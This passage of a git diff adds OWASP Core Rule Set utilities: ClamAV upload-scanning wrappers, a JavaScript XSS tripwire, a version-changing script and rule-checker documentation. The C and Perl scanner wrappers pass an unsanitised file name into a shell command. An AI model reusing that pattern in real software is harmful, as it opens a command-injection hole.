b/nginx/config/owasp-crs/util/av-scanning/runAV/comp @@ -0,0 +1,2 @@ +gcc -c -o common.o -DEXTERN= common.c +gcc -o runAV -DEXTERN=extern common.o runAV.c diff --git a/nginx/config/owasp-crs/util/av-scanning/runAV/runAV-clamd.c b/nginx/config/owasp-crs/util/av-scanning/runAV/runAV-clamd.c new file mode 100755 index 00000000..c3526ad8 --- /dev/null +++ b/nginx/config/owasp-crs/util/av-scanning/runAV/runAV-clamd.c @@ -0,0 +1,48 @@ +#include "common.h" + +main(int argc, char *argv[]) +{ + char cmd[MAX_OUTPUT_SIZE]; + char output[MAX_OUTPUT_SIZE]; + int error; + char *colon; + char *keyword; + + if (argc > 1) { + sprintf (cmd, "/usr/bin/clamdscan --no-summary %s", argv[1]); + output[0] = '\0'; + error = run_cmd(cmd,output,MAX_OUTPUT_SIZE); + if (error != 0) { + printf ("1 exec error %d: OK", error); + } else if (!*output) { + printf ("1 exec empty: OK"); + } + else { + colon = strstr(output, ":"); + if (colon) { colon += 2; } + if (!colon) { + printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd); + } + else if (keyword = strstr(colon, " FOUND")) { + *keyword = '\0'; + printf ("0 clamdscan: %s", colon); + } + else if (keyword = strstr(colon, " ERROR")) { + *keyword = '\0'; + printf ("0 clamdscan: %s", colon); + } + else if (keyword = strstr(colon, "OK")) { + printf ("1 clamdscan: OK"); + } + else if (keyword = strstr(colon, "Empty file")) { + printf ("1 empty file"); + } + else if (keyword = strstr(colon, "Can't access file ")) { + printf ("0 invalid file %s", keyword+18); + } + else { + printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd); + } + } + } +} diff --git a/nginx/config/owasp-crs/util/av-scanning/runAV/runAV.c b/nginx/config/owasp-crs/util/av-scanning/runAV/runAV.c new file mode 100755 index 00000000..7d74d2e1 --- /dev/null +++ b/nginx/config/owasp-crs/util/av-scanning/runAV/runAV.c @@ -0,0 +1,48 @@ +#include "common.h" + +main(int argc, char *argv[]) +{ + char cmd[MAX_OUTPUT_SIZE]; + char output[MAX_OUTPUT_SIZE]; + int error; + char *colon; + char *keyword; + + if (argc > 1) { + sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]); + output[0] = '\0'; + error = run_cmd(cmd,output,MAX_OUTPUT_SIZE); + if (error != 0) { + printf ("1 exec error %d: OK", error); + } else if (!*output) { + printf ("1 exec empty: OK"); + } + else { + colon = strstr(output, ":"); + if (colon) { colon += 2; } + if (!colon) { + printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd); + } + else if (keyword = strstr(colon, " FOUND")) { + *keyword = '\0'; + printf ("0 clamscan: %s", colon); + } + else if (keyword = strstr(colon, " ERROR")) { + *keyword = '\0'; + printf ("0 clamscan: %s", colon); + } + else if (keyword = strstr(colon, "OK")) { + printf ("1 clamscan: OK"); + } + else if (keyword = strstr(colon, "Empty file")) { + printf ("1 empty file"); + } + else if (keyword = strstr(colon, "Can't access file ")) { + printf ("0 invalid file %s", keyword+18); + } + else { + printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd); + } + } + } +} diff --git a/nginx/config/owasp-crs/util/av-scanning/runav.pl b/nginx/config/owasp-crs/util/av-scanning/runav.pl new file mode 100755 index 00000000..c05fbf2a --- /dev/null +++ b/nginx/config/owasp-crs/util/av-scanning/runav.pl @@ -0,0 +1,40 @@ +#!/usr/bin/perl +# +# runav.pl +# Copyright (c) 2004-2011 Trustwave +# +# This script is an interface between ModSecurity and its +# ability to intercept files being uploaded through the +# web server, and ClamAV + + +$CLAMSCAN = "clamscan"; + +if ($#ARGV != 0) { + print "Usage: modsec-clamscan.pl \n"; + exit; +} + +my ($FILE) = shift @ARGV; + +$cmd = "$CLAMSCAN --stdout --disable-summary $FILE"; +$input = `$cmd`; +$input =~ m/^(.+)/; +$error_message = $1; + +$output = "0 Unable to parse clamscan output [$1]"; + +if ($error_message =~ m/: Empty file\.?$/) { + $output = "1 empty file"; +} +elsif ($error_message =~ m/: (.+) ERROR$/) { + $output = "0 clamscan: $1"; +} +elsif ($error_message =~ m/: (.+) FOUND$/) { + $output = "0 clamscan: $1"; +} +elsif ($error_message =~ m/: OK$/) { + $output = "1 clamscan: OK"; +} + +print "$output\n"; diff --git a/nginx/config/owasp-crs/util/browser-tools/js-overrides.js b/nginx/config/owasp-crs/util/browser-tools/js-overrides.js new file mode 100644 index 00000000..34d50177 --- /dev/null +++ b/nginx/config/owasp-crs/util/browser-tools/js-overrides.js @@ -0,0 +1,78 @@ +(function() { // don't leak XSSTripwire into global ns + + /* + Assumptions: + - we need to run first, before any other attacker script + - we can't prevent tripwire from being detected (e.g. by side effects) + Todo: + - a lot more in lockdown + - protect XHR + */ + var XSSTripwire = new Object(); + + XSSTripwire.report = function() { + // Notify server + var notify = XSSTripwire.newXHR(); + + // Create a results string to send back + var results; + try { + results = "HTML=" + encodeURIComponent(document.body.outerHTML); + } catch (e) {} // we don't always have document.body + + notify.open("POST", XSSTripwire.ReportURL, true); + notify.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); + notify.send(results); + } + + XSSTripwire.lockdown = function(obj, name) { + if (Object.defineProperty) { + Object.defineProperty(obj, name, { + configurable: false + }) + } + } + + XSSTripwire.newXHR = function() { + var xmlreq = false; + if (window.XMLHttpRequest) { + xmlreq = new XMLHttpRequest(); + } else if (window.ActiveXObject) { + // Try ActiveX + try { + xmlreq = new ActiveXObject("Msxml2.XMLHTTP"); + } catch (e1) { + // first method failed + try { + xmlreq = new ActiveXObject("Microsoft.XMLHTTP"); + } catch (e2) { + // both methods failed + } + } + } + return xmlreq; + }; + + XSSTripwire.proxy = function(obj, name, report_function_name, exec_original) { + var proxy = obj[name]; + obj[name] = function() { + // URL of the page to notify, in the event of a detected XSS event: + XSSTripwire.ReportURL = "xss-tripwire-report?function=" + encodeURIComponent(report_function_name); + + XSSTripwire.report(); + + if (exec_original) { + return proxy.apply(this, arguments); + } + }; + XSSTripwire.lockdown(obj, name); + }; + + XSSTripwire.proxy(window, 'alert', 'window.alert', true); + XSSTripwire.proxy(window, 'confirm', 'window.confirm', true); + XSSTripwire.proxy(window, 'prompt', 'window.prompt', true); + XSSTripwire.proxy(window, 'unescape', 'unescape', true); + XSSTripwire.proxy(document, 'write', 'document.write', true); + XSSTripwire.proxy(String, 'fromCharCode', 'String.fromCharCode', true); + +})(); diff --git a/nginx/config/owasp-crs/util/change-version/README.md b/nginx/config/owasp-crs/util/change-version/README.md new file mode 100644 index 00000000..7867d311 --- /dev/null +++ b/nginx/config/owasp-crs/util/change-version/README.md @@ -0,0 +1,113 @@ +# Change version in CRS + +This page describes how can you change the version strings in CRS rules. + +## Goals + +The problem is change the version string in CRS rules isn't trivial. Version string used for mark all rule by the `ver` action, mark the whole file in a comment, or mark the rule set with `SecComponentSignature`. Few examples: + +* in a rule: `SecRule ARGS "foo" "id:1,phase:1,ver:'OWASP_CRS/3.3.0',pass"` +* comment: `# OWASP ModSecurity Core Rule Set ver.3.3.0` +* config directive: `SecComponentSignature "OWASP_CRS/3.3.0"` + +There are many other pattern which look-a-like version string, but that isn't it. + +The main task is replace only the real version strings by the new one. + +The Python script below helps to do that on the whole rule set or any unique file. + +## Prerequisites + +* Python3 interpreter +* [msc_pyparser](https://github.com/digitalwave/msc_pyparser) +* CRS rule set + +You can install the `msc_pyparser` through PIP - that's the recommended method, see the [instructions](https://github.com/digitalwave/msc_pyparser#installing-using-pip3). + +If you already have this package, don't forget to update it before you start the work: + +```bash +python3 -m pip install --upgrade msc_pyparser +``` + +## Usage + +The script expects three mandatory and one optional arguments: + +* input file or directory +* output **directory** +* version string for `ver` actions and `SecComponentSignature` - these are always the same +* and optionally, the version string for comments + +Please note that the input can be a single file (eg. 'coreruleset/rules/REQUEST-901-INITIALIZATION.conf' or a directory with meta name, eg 'coreruleset/rules/*.conf'. Also note that the output argument is always a **directory** where the script puts the transformed file or files. + +### Run the script + +Consider you want to change only the `ver` and `SecComponentSignature` values by a new one, eg: `OWASP_CRS/3.4.0-dev`. The current value is `OWASP_CRS/3.3.0`. The next command will solve this: + +```bash +mkdir /path/to/coreruleset/rules_new +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... +Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf +``` + +The new files will placed under the `/path/to/coreruleset/rules_new`, now make a diff: + +```bash +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... +``` + +As you can see, the comments have been left untouched. + +In the next example, we can replace them too: + +```bash +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" "3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... +Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf +``` + +Run the diff again: + +```bash +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +2c2 +< # OWASP ModSecurity Core Rule Set ver.3.3.0 +--- +> # OWASP ModSecurity Core Rule Set ver.3.4.0-dev +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... +``` + +As you can see, the version string at the end of comment line has changed in line 2. diff --git a/nginx/config/owasp-crs/util/change-version/README.txt b/nginx/config/owasp-crs/util/change-version/README.txt new file mode 100644 index 00000000..984a91c5 --- /dev/null +++ b/nginx/config/owasp-crs/util/change-version/README.txt @@ -0,0 +1,117 @@ +Change version in CRS +===================== + +This page describes how can you change the version strings in CRS rules. + + +Goals +----- +The problem is change the version string in CRS rules isn't trivial. Version +string used for mark all rule by the ver action, mark the whole file in a +comment, or mark the rule set with SecComponentSignature. Few examples: + + * in a rule: SecRule ARGS "foo" "id:1,phase:1,ver:'OWASP_CRS/3.3.0',pass" + * comment: # OWASP ModSecurity Core Rule Set ver.3.3.0 + * config directive: SecComponentSignature "OWASP_CRS/3.3.0" + +There are many other pattern which look-a-like version string, but that +isn't it. + +The main task is replace only the real version strings by the new one. + +The Python script below helps to do that on the whole rule set or any unique +file. + +Prerequisites +------------- + * Python3 interpreter + * msc_pyparser + * CRS rule set + +You can install the msc_pyparser through PIP - that's the recommended method, +see the instructions. + +If you already have this package, don't forget to update it before you start +the work: + +python3 -m pip install --upgrade msc_pyparser + + +Usage +----- +The script expects three mandatory and one optional arguments: + +* input file or directory +* output directory +* version string for ver actions and SecComponentSignature - these are always + the same and optionally, the version string for comments + +Please note that the input can be a single file (eg. +'coreruleset/rules/REQUEST-901-INITIALIZATION.conf' or a directory with meta +name, eg 'coreruleset/rules/*.conf'. Also note that the output argument is +always a directory where the script puts the transformed file or files. + +Run the script +-------------- +Consider you want to change only the ver and SecComponentSignature values by a +new one, eg: OWASP_CRS/3.4.0-dev. The current value is OWASP_CRS/3.3.0. The +next command will solve this: + +mkdir /path/to/coreruleset/rules_new +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... +Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf + +The new files will placed under the /path/to/coreruleset/rules_new, now make a diff: + +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... + +As you can see, the comments have been left untouched. + +In the next example, we can replace them too: + +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" "3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... +Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf + +Run the diff again: + +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +2c2 +< # OWASP ModSecurity Core Rule Set ver.3.3.0 +--- +> # OWASP ModSecurity Core Rule Set ver.3.4.0-dev +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... + +As you can see, the version string at the end of comment line has changed in line 2. diff --git a/nginx/config/owasp-crs/util/change-version/change-version.py b/nginx/config/owasp-crs/util/change-version/change-version.py new file mode 100755 index 00000000..6e39a8e7 --- /dev/null +++ b/nginx/config/owasp-crs/util/change-version/change-version.py @@ -0,0 +1,105 @@ +#!/usr/bin/env python3 + +import sys +import glob +import msc_pyparser +import os.path +import re + +class FileTransform(object): + def __init__(self, data): + self.data = data + self.cverpatt = "ver\.\d+\.\d+\.\d+$" + self.re_cverpatt = re.compile(self.cverpatt) + + def change_version(self, version, cversion): + # iterate through AST items + # self.data: the parsed structure + for d in self.data: + # id the item has 'actions' then we can check the 'ver' key + if "actions" in d: + aidx = 0 + while aidx < len(d['actions']): + a = d['actions'][aidx] + # if we found one, replace the value + if a['act_name'] == "ver": + a['act_arg'] = version + aidx += 1 + else: + # replace SecComponentSignature by same version string + if d['type'].lower() == "seccomponentsignature": + d['arguments'][0]['argument'] = version + + # replace the versions in comments if cversion exists + if cversion is not None: + if d['type'].lower() == "comment" and self.re_cverpatt.search(d['argument']): + d['argument'] = re.sub(self.cverpatt, "ver.%s" % (cversion), d['argument']) + +class FileHandler(object): + def __init__(self, **kwargs): + for key, value in kwargs.items(): + setattr(self, key, value) + if not hasattr(self, 'cversion'): + self.cversion = None + + self.output = self.output.rstrip("/") + "/" + + # iterate through the list of files + for f in glob.glob(self.input): + print(f"Working with file: %s" % (f)) + # read the file content + try: + with open(f) as file: + data = file.read() + except: + print("Exception caught - ", sys.exc_info()) + sys.exit(1) + + # build AST from content + try: + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data) + except: + print(sys.exc_info()[1]) + sys.exit(1) + + # change version and comment version if exists + try: + t = FileTransform(mparser.configlines) + t.change_version(self.version, self.cversion) + except: + print(sys.exc_info()[1]) + sys.exit(1) + + # save the new file + try: + mwriter = msc_pyparser.MSCWriter(mparser.configlines) + output = os.path.join(self.output, os.path.basename(f).lstrip("/")) + with open(output, "w") as file: + mwriter.generate() + # add extra new line at the end of file + mwriter.output.append("") + file.write("\n".join(mwriter.output)) + except: + print("Exception caught - ", sys.exc_info()) + sys.exit(1) + +if len(sys.argv) < 4: + print("Argument missing!") + print("Use: %s rule.conf /path/to/output/directory version" % sys.argv[0]) + print(" %s \"/path/to/rules/*.conf\" /path/to/output/directory version [comment_version]" % sys.argv[0]) + print("Example:") + print(" mkdir ../../rulestmp") + print(" %s \"../../rules/*.conf\" ../../rulestmp \"OWASP_CRS/3.4.0-dev\" \"3.4.0-dev\"" % sys.argv[0]) + sys.exit(1) + +args = { + 'input' : sys.argv[1], + 'output' : sys.argv[2], + 'version' : sys.argv[3] +} + +if len(sys.argv) > 4: + args['cversion'] = sys.argv[4] + +fh = FileHandler(**args) diff --git a/nginx/config/owasp-crs/util/crs-rules-check/CHANGES b/nginx/config/owasp-crs/util/crs-rules-check/CHANGES new file mode 100644 index 00000000..109d221f --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/CHANGES @@ -0,0 +1,3 @@ +v0.1 - 2021-12-02 +----------------- + * Initial release diff --git a/nginx/config/owasp-crs/util/crs-rules-check/README.md b/nginx/config/owasp-crs/util/crs-rules-check/README.md new file mode 100644 index 00000000..404443e8 --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/README.md @@ -0,0 +1,416 @@ +crs_rules_check +=============== + +Welcome to the `crs_rules_check` documentation. + +Prerequisites +============= + +To run the tool, you need: + ++ a **Python 3** interpreter ++ **msc_pyparser** - a SecRule parser (>=1.2.1) + +`msc_pyparser` was written in Python 3 and has not been tested with Python 2, therefore you have to use Python 3. + +The best way to install the required packages just run + +``` +pip3 install -r requirements.txt +``` + +How does it work +================ + +The script expects an argument at least - this would be a single file or a file list, eg: `/path/to/coreruleset/*.conf`. + +First, an attempt is made to parse each file specified on the command line. This is a "pre-check", and runs on all files before the other tests. + * **Parsing check** - try to parse the structure, this is a syntax check + **note**: this script is a bit more strict than mod_security. There are some cases, where mod_security allows the syntax, but [msc_pyparser](https://github.com/digitalwave/msc_pyparser/) not. + +Second, the script loops over each of the parsed structures. Each iteration consists of the following steps: + * **Casing check** - checks operators, actions, transformations and ctl names for proper casing + e.g., `@beginsWith` is allowed, `@beginswith` is not. In this step, the script also ensures that an operator is present, eg `SecRule ARGS "^.*"` isn't allowed without `@rx` operator. + * **Action order check** - This step verifies that actions are specified in the correct order - [see the wiki](https://github.com/coreruleset/coreruleset/wiki/Order-of-ModSecurity-Actions-in-CRS-rules) + * **Format check** CRS has a good reference for [indentation](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/CONTRIBUTING.md#general-formatting-guidelines-for-rules-contributions) and other formatting. `msc_pyparser` follows these rules when it creates the config file(s) from parsed structure(s). After the re-build is done, it runs a compare between the original file and the built one with help of `difflib`. The script reports all non-compliant formatting. + **Note**, that `difflib` is a part of the standard Python library, you don't need to install it. + * **Deprecation check** - This step checks for use of deprecated features. The following features are deprecated: + * `ctl:auditLogParts` [is no longer supported by CRS](https://github.com/coreruleset/coreruleset/pull/3090) + * **Duplicate ID's check** - This step checks that each rule has a unique ID. + * **paranoia-level/N tag and its value** - This step checks that the `paranoia-level/N` tag is present when required and whether it has the correct value `N` for its context. Specifically: + * if a rule is activated for a specific paranoia level `L` and does not have the `nolog` action, the `paranoia-level/N` tag **must** be set and the value of `N` **must** be `L` + * if a rule is activated outside of any paranoia level, or has the `nolog` action, the `paranoia-level/N` tag **must not** be set + * **Anomaly scoring check** - This step checks that rules are configured properly for the anomaly scoring mechanism: + * every rule must update the correct scoring variable with the correct severity related score, for example: `setvar:inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}` + * every rule must update the correct scoring variable with the correct severity related score, for example: `setvar:inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}` + * **Initialization of used transaction (TX) variables** - all used TX variables **must** be initialised before their first use. Using a TX variable means one of the following: + * the variable is a target of a rule, e.g., `SecRule TX.foo ...` + * the variable is an operator argument, eg `SecRule ARGS "@rx %{TX.foo}"...` + * the variable is a right hand side operand in a `setvar` action, eg `setvar:tx.bar=%{tx.foo}` + * the variable is in an expansion, e.g., as part of the value of a `msg` action: `msg:'Current value of variable: %{tx.foo}` + +Finally, the script prints a report of all unused TX variables. Usually, unused TX variables occur when a rule creates a TX variable (e.g., `setvar:tx.foo=1`) but the value of the variable is never used anywhere else. This will only be revealed after the script has checked all rules. + + +If script finds any parser error, it stops immediately. In case of other error, shows it (rule-by-rule). Finally, the script returns a non-zero value. + +If everything is fine, rule returns with 0. + +Normally, you should run the script: + +``` +./util/crs-rules-check/rules-check.py -r crs-setup.conf.example -r rules/*.conf +``` + +Optionally, you can add the option `--output=github` (default value is `native`): + +``` +./util/crs-rules-check/rules-check.py --output=github -r crs-setup.conf.example -r rules/*.conf +``` + +In this case, each line will have a prefix, which could be `::debug` or `::error`. See [this](https://docs.github.com/en/actions/using-workflows/workflow-commands-for-github-actions#setting-an-error-message). + +Examples +======== + +To run these samples, see the files in `examples` directory. + +### Test 1 - syntax check + +``` +SecRule &ARGS_GET "@eq 3" \ + "id:1,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + chain + SecRule ARGS_GET:foo "@rx bar" \ + "t:none,t:urlDecodeUni,t:lowercase,\ + setvar:'tx.some_vars=1' +``` + +As you can see, there are two `"` missing above: the first one after the `chain`, and the other one from the end of the chained rule. Mod_security allows this, but this isn't well formed. (See [#2184](https://github.com/coreruleset/coreruleset/pull/2184)) + +Check it: + +``` +$ ./rules-check.py -r examples/test1.conf +Config file: examples/test1.conf +Can't parse config file: examples/test1.conf + file=examples/test1.conf, line=8, endLine=8, title=Parser error: can't parse file +$ echo $? +1 +``` + +### Test 2 - case sensitive test + +``` +SecRule REQUEST_URI "@beginswith /index.php" \ + "id:1,\ + phase:1,\ + deny,\ + t:none,\ + nolog" +``` + +In this rule the operator is lowercase. Mod_security allows both form. + +``` +$ ./rules-check.py -r examples/test2.conf +Config file: examples/test2.conf + Parsing ok. + Ignore case check found error(s) + file=examples/test2.conf, line=1, endLine=1, title=Case check: Operator case mismatch: @beginswith (rule: 1) + Action order check ok. + Indentation check ok. +$ echo $? +1 +``` + +### Test 3 - wrong action ordering + +``` +SecRule REQUEST_URI "@beginsWith /index.php" \ + "phase:1,\ + id:1,\ + deny,\ + t:none,\ + nolog" +``` + +In this rule, the `phase` and `id` are interchanged. As [documentation](https://github.com/coreruleset/coreruleset/wiki/Order-of-ModSecurity-Actions-in-CRS-rules) says, the first action **must** be the `id`, the second one is the `phase`. + +``` +$ ./rules-check.py -r examples/test3.conf +Config file: examples/test3.conf + Parsing ok. + Ignore case check ok. + Action order check found error(s) + file=examples/test3.conf, line=3, endLine=3, title=Action order check: action 'phase' at pos 0 is wrong place against 'id' at pos 1 (rule: 1) + Indentation check ok. +$ echo $? +1 +``` + +### Test 4 - wrong indentation + +``` + SecRule ARGS "@rx foo" \ + "id:1,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx foo" \ + "id:2,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx foo" \ + "id:3,\ + phase:1,\ + pass,\ + nolog" +``` + +In this rule set, the first line and the rule with `id:3` first action have an extra leading space. As [documentation](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/CONTRIBUTING.md#general-formatting-guidelines-for-rules-contributions) describes, CRS has a strict indentation rules. The script checks the indentation with help of Python's [difflib](https://docs.python.org/3.9/library/difflib.html). + +``` +$ ./rules-check.py -r examples/test4.conf +Config file: examples/test4.conf + Parsing ok. + Ignore case check ok. + Action order check ok. + Indentation check found error(s) +--- ++++ + file=examples/test4.conf, line=1, endLine=6, title=Indentation error: an indetation error has found +@@ -1,5 +1,5 @@ +- SecRule ARGS "@rx foo" \ +- "id:1,\ ++SecRule ARGS "@rx foo" \ ++ "id:1,\ + phase:1,\ + pass,\ + nolog" + file=examples/test4.conf, line=11, endLine=18, title=Indentation error: an indetation error has found +@@ -11,7 +11,7 @@ + nolog" + + SecRule ARGS "@rx foo" \ +- "id:3,\ ++ "id:3,\ + phase:1,\ + pass,\ + nolog" +``` + +### Test 5 - empty (implicit @rx) operator + +``` +SecRule REQUEST_URI "index.php" \ + "phase:1,\ + id:1,\ + deny,\ + t:none,\ + nolog" +``` + +In this rule, the operator is missing. As [ModSecurity documentation](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-(v2.x)#rx) says "the rules that do not explicitly specify an operator default to @rx". In CRS, this isn't allowed. + +``` +$ ./rules-check.py -r examples/test5.conf +Config file: examples/test5.conf + Parsing ok. + Ignore case check found error(s) + file=examples/test5.conf, line=1, endLine=1, title=Case check: Empty operator isn't allowed (rule: 1) + Action order check ok. + Indentation check ok. +$ echo $? +1 +``` + +### Test 6 - check that rule does not contain 'ctl:auditLogParts' + +``` +SecRule TX:sql_error_match "@eq 1" \ + "id:1,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + ctl:auditLogParts=+E" +``` + +The `ctl:auditLogParts=+E` (or any kind of `ctl:auditLogParts`) is not allowed in CRS. + +See the CRS PR [#3034](https://github.com/coreruleset/coreruleset/pull/3034) + +``` +$ util/crs-rules-check/rules-check.py -r util/crs-rules-check/examples/test6.conf +Config file: util/crs-rules-check/examples/test6.conf + Parsing ok. + Ignore case check ok. + Action order check ok. + Indentation check ok. + Found 'ctl:auditLogParts' action is in wrong place. + file=util/crs-rules-check/examples/test6.conf, line=7, endLine=7, title='ctl:auditLogParts' action in wrong place: action can only be placed in last part of a chained rule (rule: 1) +$ echo $? +1 +``` + +### Test 7 - check duplicate id's + +``` +SecRule ARGS "@rx foo" \ + "id:1001,\ + phase:2,\ + block,\ + capture,\ + t:none" + +SecRule ARGS_NAMES "@rx bar" \ + "id:1001,\ + phase:2,\ + block,\ + capture,\ + t:none" +``` + +In this rule file, there are two rules with same `id`. + +``` +$ util/crs-rules-check/rules-check.py -r util/crs-rules-check/examples/test7.conf +Config file: util/crs-rules-check/examples/test7.conf + Parsing ok. +Checking parsed rules... +util/crs-rules-check/examples/test7.conf + Ignore case check ok. + Action order check ok. + Indentation check ok. + 'ctl:auditLogParts' actions are in right place. + Found duplicated id('s) + file=util/crs-rules-check/examples/test7.conf, line=10, endLine=10, title='id' is duplicated: id 1001 is duplicated, previous place: util/crs-rules-check/examples/test7.conf:3 + paranoia-level tags are correct. + PL anomaly_scores are correct. + All TX variables are set +End of checking parsed rules +$ echo $? +1 +``` + +### Test 8 - paranoia-level consitency check + +``` +SecRule &TX:blocking_paranoia_level "@eq 0" \ + "id:901120,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.blocking_paranoia_level=1'" + +SecRule &TX:detection_paranoia_level "@eq 0" \ + "id:901125,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'" + +SecRule &TX:error_anomaly_score "@eq 0" \ + "id:901141,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.error_anomaly_score=4'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920160,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920161,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/1',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920162,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/1',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT" + +``` + +In this rule file, there are more problems: +* rule 920160 is activated on PL1, but the `tag` value is PL2 +* at rule 920160, the TX variable gets error_anomaly_score, but the severity is CRITICAL +* at rule 920161 there is no severity action +* rule 920162 increments anomaly_score_pl2, but it's in PL1 + +``` +$ ./rules-check.py -r examples/test8.conf +Config file: examples/test8.conf + Parsing ok. +Checking parsed rules... +examples/test8.conf + Ignore case check ok. + Action order check ok. + Indentation check ok. + 'ctl:auditLogParts' actions are in right place. + no duplicate id's + Found incorrect paranoia-level/N tag(s) + file=examples/test8.conf, line=34, endLine=34, title=wrong or missing paranoia-level/N tag: tag 'paranoia-level/2' on PL 1, rule id: 920160 + Found incorrect (inbound|outbout)_anomaly_score value(s) + file=examples/test8.conf, line=36, endLine=36, title=wrong 